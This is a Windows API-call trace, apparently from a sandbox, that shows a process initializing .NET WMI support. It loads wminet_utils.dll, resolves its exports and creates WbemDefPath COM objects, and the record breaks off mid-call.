GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.332] CoTaskMemFree (pv=0x1b7404f0) [0105.336] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.336] CoTaskMemFree (pv=0x1b7404f0) [0105.395] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.395] CoTaskMemFree (pv=0x1b7404f0) [0105.397] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.397] CoTaskMemFree (pv=0x1b7404f0) [0105.398] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.398] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.398] CoTaskMemFree (pv=0x1b7404f0) [0105.401] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.401] CoTaskMemFree (pv=0x1b7404f0) [0105.402] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.402] CoTaskMemFree (pv=0x1b7404f0) [0105.404] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.404] CoTaskMemFree (pv=0x1b7404f0) [0105.405] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.405] CoTaskMemFree (pv=0x1b7404f0) [0105.423] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.423] CoTaskMemFree (pv=0x1b7404f0) [0105.497] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.497] CoTaskMemFree (pv=0x1b7404f0) [0105.511] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.511] CoTaskMemFree (pv=0x1b7404f0) [0105.921] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0105.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0105.922] CoTaskMemFree (pv=0x1b7404f0) [0106.003] VirtualQuery (in: lpAddress=0x1c64d0b0, lpBuffer=0x1c64df70, dwLength=0x30 | out: lpBuffer=0x1c64df70*(BaseAddress=0x1c64d000, AllocationBase=0x1bcc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0106.015] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0106.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0106.015] CoTaskMemFree (pv=0x1b7404f0) [0106.053] CoTaskMemAlloc (cb=0x104) returned 0x1b7404f0 [0106.053] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7404f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0106.053] CoTaskMemFree (pv=0x1b7404f0) [0106.130] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x338 [0106.133] CoGetObjectContext (in: riid=0x1c64d7b8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d7b0 | out: ppv=0x1c64d7b0*=0x212498) returned 0x0 [0106.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c64c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0106.166] CoTaskMemAlloc (cb=0x43) returned 0x1b774ff0 [0106.166] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\\\wminet_utils.dll") returned 0x642ffff0000 [0106.302] CoTaskMemFree (pv=0x1b774ff0) [0106.303] CoTaskMemAlloc (cb=0xf) returned 0x1b77b0f0 [0106.304] GetProcAddress (hModule=0x642ffff0000, lpProcName="ResetSecurity") returned 0x642ffff20e0 [0106.304] CoTaskMemFree (pv=0x1b77b0f0) [0106.332] CoTaskMemAlloc (cb=0xd) returned 0x1b77b0f0 [0106.332] GetProcAddress (hModule=0x642ffff0000, lpProcName="SetSecurity") returned 0x642ffff21b0 [0106.332] CoTaskMemFree (pv=0x1b77b0f0) [0106.364] CoTaskMemAlloc (cb=0x14) returned 0x1b77b0f0 [0106.364] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServices") returned 0x642ffff2290 [0106.364] CoTaskMemFree (pv=0x1b77b0f0) [0106.427] CoTaskMemAlloc (cb=0x1a) returned 0x2cbf90 [0106.427] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServicesObject") returned 0x642ffff23b0 [0106.427] CoTaskMemFree (pv=0x2cbf90) [0106.490] CoTaskMemAlloc (cb=0x13) returned 0x1b77b0f0 [0106.491] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyHandle") returned 0x642ffff24d0 [0106.491] CoTaskMemFree (pv=0x1b77b0f0) [0106.522] CoTaskMemAlloc (cb=0x14) returned 0x1b77b0f0 [0106.522] GetProcAddress (hModule=0x642ffff0000, lpProcName="WritePropertyValue") returned 0x642ffff2500 [0106.522] CoTaskMemFree (pv=0x1b77b0f0) [0106.548] CoTaskMemAlloc (cb=0x7) returned 0x1b77f740 [0106.549] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530 [0106.549] CoTaskMemFree (pv=0x1b77f740) [0106.575] CoTaskMemAlloc (cb=0x11) returned 0x1b77b130 [0106.575] GetProcAddress (hModule=0x642ffff0000, lpProcName="VerifyClientKey") returned 0x642ffff31f0 [0106.575] CoTaskMemFree (pv=0x1b77b130) [0106.595] CoTaskMemAlloc (cb=0x11) returned 0x1b77b130 [0106.595] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetQualifierSet") returned 0x642ffff2a50 [0106.595] CoTaskMemFree (pv=0x1b77b130) [0106.622] CoTaskMemAlloc (cb=0x5) returned 0x1b77f740 [0106.623] GetProcAddress (hModule=0x642ffff0000, lpProcName="Get") returned 0x642ffff2700 [0106.623] CoTaskMemFree (pv=0x1b77f740) [0106.674] CoTaskMemAlloc (cb=0x5) returned 0x1b77f740 [0106.674] GetProcAddress (hModule=0x642ffff0000, lpProcName="Put") returned 0x642ffff26c0 [0106.674] CoTaskMemFree (pv=0x1b77f740) [0106.705] CoTaskMemAlloc (cb=0x8) returned 0x1b77f740 [0106.706] GetProcAddress (hModule=0x642ffff0000, lpProcName="Delete") returned 0x642ffff2750 [0106.706] CoTaskMemFree (pv=0x1b77f740) [0106.723] CoTaskMemAlloc (cb=0xa) returned 0x1b77b130 [0106.724] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetNames") returned 0x642ffff2760 [0106.724] CoTaskMemFree (pv=0x1b77b130) [0106.783] CoTaskMemAlloc (cb=0x12) returned 0x1b77b130 [0106.783] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginEnumeration") returned 0x642ffff27b0 [0106.783] CoTaskMemFree (pv=0x1b77b130) [0106.793] CoTaskMemAlloc (cb=0x6) returned 0x1b77f740 [0106.794] GetProcAddress (hModule=0x642ffff0000, lpProcName="Next") returned 0x642ffff27c0 [0106.794] CoTaskMemFree (pv=0x1b77f740) [0106.805] CoTaskMemAlloc (cb=0x10) returned 0x1b77b130 [0106.806] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndEnumeration") returned 0x642ffff2810 [0106.806] CoTaskMemFree (pv=0x1b77b130) [0106.810] CoTaskMemAlloc (cb=0x19) returned 0x1b76aea0 [0106.810] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyQualifierSet") returned 0x642ffff2820 [0106.810] CoTaskMemFree (pv=0x1b76aea0) [0106.815] CoTaskMemAlloc (cb=0x7) returned 0x1b77f740 [0106.816] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530 [0106.816] CoTaskMemFree (pv=0x1b77f740) [0106.816] CoTaskMemAlloc (cb=0xf) returned 0x1b77b0f0 [0106.816] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetObjectText") returned 0x642ffff2840 [0106.816] CoTaskMemFree (pv=0x1b77b0f0) [0106.822] CoTaskMemAlloc (cb=0x13) returned 0x1b77b130 [0106.822] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnDerivedClass") returned 0x642ffff2860 [0106.822] CoTaskMemFree (pv=0x1b77b130) [0106.828] CoTaskMemAlloc (cb=0xf) returned 0x1b77b0f0 [0106.828] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnInstance") returned 0x642ffff2880 [0106.828] CoTaskMemFree (pv=0x1b77b0f0) [0106.832] CoTaskMemAlloc (cb=0xb) returned 0x1b77b130 [0106.832] GetProcAddress (hModule=0x642ffff0000, lpProcName="CompareTo") returned 0x642ffff28a0 [0106.832] CoTaskMemFree (pv=0x1b77b130) [0106.836] CoTaskMemAlloc (cb=0x13) returned 0x1b77b130 [0106.836] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyOrigin") returned 0x642ffff28c0 [0106.836] CoTaskMemFree (pv=0x1b77b130) [0106.840] CoTaskMemAlloc (cb=0xe) returned 0x1b77b130 [0106.840] GetProcAddress (hModule=0x642ffff0000, lpProcName="InheritsFrom") returned 0x642ffff28e0 [0106.840] CoTaskMemFree (pv=0x1b77b130) [0106.843] CoTaskMemAlloc (cb=0xb) returned 0x1b77b130 [0106.843] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethod") returned 0x642ffff28f0 [0106.843] CoTaskMemFree (pv=0x1b77b130) [0106.846] CoTaskMemAlloc (cb=0xb) returned 0x1b77b130 [0106.846] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutMethod") returned 0x642ffff2940 [0106.846] CoTaskMemFree (pv=0x1b77b130) [0106.848] CoTaskMemAlloc (cb=0xe) returned 0x1b77b130 [0106.849] GetProcAddress (hModule=0x642ffff0000, lpProcName="DeleteMethod") returned 0x642ffff2990 [0106.849] CoTaskMemFree (pv=0x1b77b130) [0106.850] CoTaskMemAlloc (cb=0x18) returned 0x1b77b130 [0106.851] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginMethodEnumeration") returned 0x642ffff29a0 [0106.851] CoTaskMemFree (pv=0x1b77b130) [0106.852] CoTaskMemAlloc (cb=0xc) returned 0x1b77b130 [0106.853] GetProcAddress (hModule=0x642ffff0000, lpProcName="NextMethod") returned 0x642ffff29b0 [0106.853] CoTaskMemFree (pv=0x1b77b130) [0106.855] CoTaskMemAlloc (cb=0x16) returned 0x1b77b130 [0106.855] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndMethodEnumeration") returned 0x642ffff2a00 [0106.855] CoTaskMemFree (pv=0x1b77b130) [0106.856] CoTaskMemAlloc (cb=0x17) returned 0x1b77b130 [0106.856] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodQualifierSet") returned 0x642ffff2a10 [0106.856] CoTaskMemFree (pv=0x1b77b130) [0106.858] CoTaskMemAlloc (cb=0x11) returned 0x1b77b0f0 [0106.858] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodOrigin") returned 0x642ffff2a30 [0106.858] CoTaskMemFree (pv=0x1b77b0f0) [0106.861] CoTaskMemAlloc (cb=0x12) returned 0x1b77b0f0 [0106.862] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Get") returned 0x642ffff2a60 [0106.862] CoTaskMemFree (pv=0x1b77b0f0) [0106.864] CoTaskMemAlloc (cb=0x12) returned 0x1b77b0f0 [0106.864] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Put") returned 0x642ffff2ab0 [0106.864] CoTaskMemFree (pv=0x1b77b0f0) [0106.866] CoTaskMemAlloc (cb=0x15) returned 0x1b77b0f0 [0106.867] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Delete") returned 0x642ffff2ae0 [0106.867] CoTaskMemFree (pv=0x1b77b0f0) [0106.868] CoTaskMemAlloc (cb=0x17) returned 0x1b77b0f0 [0106.868] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_GetNames") returned 0x642ffff2af0 [0106.868] CoTaskMemFree (pv=0x1b77b0f0) [0106.871] CoTaskMemAlloc (cb=0x1f) returned 0x1b76b0b0 [0106.871] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x642ffff2b10 [0106.871] CoTaskMemFree (pv=0x1b76b0b0) [0106.872] CoTaskMemAlloc (cb=0x13) returned 0x1b77b0f0 [0106.873] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Next") returned 0x642ffff2b20 [0106.873] CoTaskMemFree (pv=0x1b77b0f0) [0106.876] CoTaskMemAlloc (cb=0x1d) returned 0x2cbf90 [0106.876] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_EndEnumeration") returned 0x642ffff2b70 [0106.876] CoTaskMemFree (pv=0x2cbf90) [0106.876] CoTaskMemAlloc (cb=0x19) returned 0x1b76aed0 [0106.877] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetCurrentApartmentType") returned 0x642ffff2a50 [0106.877] CoTaskMemFree (pv=0x1b76aed0) [0106.878] CoTaskMemAlloc (cb=0x16) returned 0x1b77b0f0 [0106.878] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetDemultiplexedStub") returned 0x642ffff2060 [0106.878] CoTaskMemFree (pv=0x1b77b0f0) [0106.880] CoTaskMemAlloc (cb=0x17) returned 0x1b77b0f0 [0106.881] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateInstanceEnumWmi") returned 0x642ffff1760 [0106.881] CoTaskMemFree (pv=0x1b77b0f0) [0106.885] CoTaskMemAlloc (cb=0x14) returned 0x1b77b0f0 [0106.885] GetProcAddress (hModule=0x642ffff0000, lpProcName="CreateClassEnumWmi") returned 0x642ffff18c0 [0106.885] CoTaskMemFree (pv=0x1b77b0f0) [0106.888] CoTaskMemAlloc (cb=0xe) returned 0x1b77b0f0 [0106.888] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecQueryWmi") returned 0x642ffff1a20 [0106.888] CoTaskMemFree (pv=0x1b77b0f0) [0106.894] CoTaskMemAlloc (cb=0x1a) returned 0x1b76aea0 [0106.894] GetProcAddress (hModule=0x642ffff0000, lpProcName="ExecNotificationQueryWmi") returned 0x642ffff1b90 [0106.894] CoTaskMemFree (pv=0x1b76aea0) [0106.898] CoTaskMemAlloc (cb=0x10) returned 0x1b77b0f0 [0106.898] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutInstanceWmi") returned 0x642ffff1d00 [0106.898] CoTaskMemFree (pv=0x1b77b0f0) [0106.901] CoTaskMemAlloc (cb=0xd) returned 0x1b77b0f0 [0106.901] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutClassWmi") returned 0x642ffff1e00 [0106.901] CoTaskMemFree (pv=0x1b77b0f0) [0106.904] CoTaskMemAlloc (cb=0x1a) returned 0x1b76aed0 [0106.904] GetProcAddress (hModule=0x642ffff0000, lpProcName="CloneEnumWbemClassObject") returned 0x642ffff1f00 [0106.904] CoTaskMemFree (pv=0x1b76aed0) [0106.906] CoTaskMemAlloc (cb=0x12) returned 0x1b77b0f0 [0106.907] GetProcAddress (hModule=0x642ffff0000, lpProcName="ConnectServerWmi") returned 0x642ffff34c0 [0106.907] CoTaskMemFree (pv=0x1b77b0f0) [0106.909] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d7d0 | out: pAptType=0x1c64d7d0*=1) returned 0x0 [0106.910] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d8d8 | out: ppvObject=0x1c64d8d8*=0x0) returned 0x80004002 [0106.910] IUnknown:Release (This=0x212498) returned 0x0 [0107.140] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x1c64cfd0 | out: lpiid=0x1c64cfd0) returned 0x0 [0107.140] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64ce40 | out: ppv=0x1c64ce40*=0x1c8e1370) returned 0x0 [0107.163] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1370, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb50 | out: ppvObject=0x1c64cb50*=0x0) returned 0x80004002 [0107.163] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8e1370, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cb38 | out: ppvObject=0x1c64cb38*=0x1c8e1390) returned 0x0 [0107.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1390, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ca40 | out: ppvObject=0x1c64ca40*=0x1c8e1390) returned 0x0 [0107.166] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1390, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cac0 | out: ppvObject=0x1c64cac0*=0x0) returned 0x80004002 [0107.167] WbemDefPath:IUnknown:AddRef (This=0x1c8e1390) returned 0x3 [0107.168] CoGetContextToken (in: pToken=0x1c64c710 | out: pToken=0x1c64c710) returned 0x0 [0107.169] CoGetObjectContext (in: riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1b7750a8 | out: ppv=0x1b7750a8*=0x212480) returned 0x0 [0107.169] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1390, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c6d0 | out: ppvObject=0x1c64c6d0*=0x1b77b150) returned 0x0 [0107.169] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b77b150, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c700 | out: pCid=0x1c64c700*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0107.170] WbemDefPath:IUnknown:Release (This=0x1b77b150) returned 0x3 [0107.170] InSendMessage () returned 0 [0107.172] CoGetContextToken (in: pToken=0x1c64c6e0 | out: pToken=0x1c64c6e0) returned 0x0 [0107.172] WbemDefPath:IUnknown:AddRef (This=0x1c8e1390) returned 0x4 [0107.172] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1390, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7f8 | out: ppvObject=0x1c64c7f8*=0x0) returned 0x80004002 [0107.172] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x3 [0107.172] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x2 [0107.172] WbemDefPath:IUnknown:Release (This=0x1c8e1370) returned 0x0 [0107.173] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x1 [0107.173] CoGetContextToken (in: pToken=0x1c64d410 | out: pToken=0x1c64d410) returned 0x0 [0107.173] CoGetContextToken (in: pToken=0x1c64d350 | out: pToken=0x1c64d350) returned 0x0 [0107.174] WbemDefPath:IUnknown:AddRef (This=0x1c8e1390) returned 0x2 [0107.174] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1390, riid=0x1c64d490*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d470 | out: ppvObject=0x1c64d470*=0x1c8e1390) returned 0x0 [0107.174] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x2 [0107.174] WbemDefPath:IUnknown:Release (This=0x1c8e1390) returned 0x1 [0107.175] CoGetObjectContext (in: riid=0x1c64c738*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c730 | out: ppv=0x1c64c730*=0x212498) returned 0x0 [0107.175] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64c750 | out: pAptType=0x1c64c750*=1) returned 0x0 [0107.175] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64c858 | out: ppvObject=0x1c64c858*=0x0) returned 0x80004002 [0107.175] IUnknown:Release (This=0x212498) returned 0x1 [0107.175] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64bdc0 | out: ppv=0x1c64bdc0*=0x1c8e1370) returned 0x0 [0107.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1370, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64bad0 | out: ppvObject=0x1c64bad0*=0x0) returned 0x80004002 [0107.176] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8e1370, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bab8 | out: ppvObject=0x1c64bab8*=0x1c8e1490) returned 0x0 [0107.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1490, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64b9c0 | out: ppvObject=0x1c64b9c0*=0x1c8e1490) returned 0x0 [0107.176] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1490, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ba40 | out: ppvObject=0x1c64ba40*=0x0) returned 0x80004002 [0107.177] WbemDefPath:IUnknown:AddRef (This=0x1c8e1490) returned 0x3 [0107.177] CoGetContextToken (in: pToken=0x1c64b690 | out: pToken=0x1c64b690) returned 0x0 [0107.177] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1490, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64b650 | out: ppvObject=0x1c64b650*=0x1b77b190) returned 0x0 [0107.177] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b77b190, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64b680 | out: pCid=0x1c64b680*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0107.177] WbemDefPath:IUnknown:Release (This=0x1b77b190) returned 0x3 [0107.177] CoGetContextToken (in: pToken=0x1c64b660 | out: pToken=0x1c64b660) returned 0x0 [0107.177] WbemDefPath:IUnknown:AddRef (This=0x1c8e1490) returned 0x4 [0107.177] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1490, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64b778 | out: ppvObject=0x1c64b778*=0x0) returned 0x80004002 [0107.177] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x3 [0107.177] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x2 [0107.178] WbemDefPath:IUnknown:Release (This=0x1c8e1370) returned 0x0 [0107.178] WbemDefPath:IUnknown:Release (This=0x1c8e1490) returned 0x1 [0107.178] CoGetContextToken (in: pToken=0x1c64c390 | out: pToken=0x1c64c390) returned 0x0 [0107.178] CoGetContextToken (in: pToken=0x1c64c2d0 | out: pToken=0x1c64c2d0) returned 0x0 [0107.178] WbemDefPath:IUnknown:AddRef (This=0x1c8e1490) returned 0x2 [0107.178] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8e1490, riid=0x1c64c410*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c3f0 | out: 